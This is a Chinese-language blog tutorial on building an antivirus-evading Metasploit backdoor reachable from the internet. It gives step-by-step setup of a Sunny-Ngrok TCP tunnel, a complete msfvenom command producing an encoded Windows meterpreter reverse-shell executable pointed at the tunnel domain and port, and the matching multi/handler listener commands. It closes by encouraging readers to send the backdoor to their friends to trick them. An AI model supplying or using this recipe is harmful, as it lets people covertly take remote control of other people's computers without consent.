渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

选择tcp协议,填一个可以使用的端口号。

 

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

开通隧道后可以在 隧道管理 中看到自己的隧道信息:

 

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

 

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

2. 启动隧道

 

首先在kali linux中下载对应的客户端,选择Linux 64位版本。

 

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

启动隧道:

./sunny clientid 隧道id

 

启动多个隧道:

./sunny clientid 隧道id,隧道id

渗透测试(二)-Metasploit生成免杀后门(外网篇)

要想后台运行可以使用 setsid 命令:

setsid ./sunny clientid 隧道id &

 

隧道连接成功后会显示:

 

渗透测试(二)-Metasploit生成免杀后门(外网篇)渗透测试(二)-Metasploit生成免杀后门(外网篇)

 

3. 生成后门

sudo su
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

  

这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。

 

如果想要在软件中绑定后门,按照 渗透测试(一)-Metasploit生成免杀后门(内网篇) 文中第7步就行,注意修改LHOST和LPORT

 

4. 监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 10716
run

 

5. 下载后门

 

同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!

如果觉得此篇文章对你有帮助,关注我的公众号【人人皆是程序员】就是对我最大的鼓励与认可!

渗透测试(二)-Metasploit生成免杀后门(外网篇)

渗透测试(二)-Metasploit生成免杀后门(外网篇)
上一篇:kali -linux第七部分之第四篇Metasploit对应用程序


下一篇:Metasploit漏洞攻击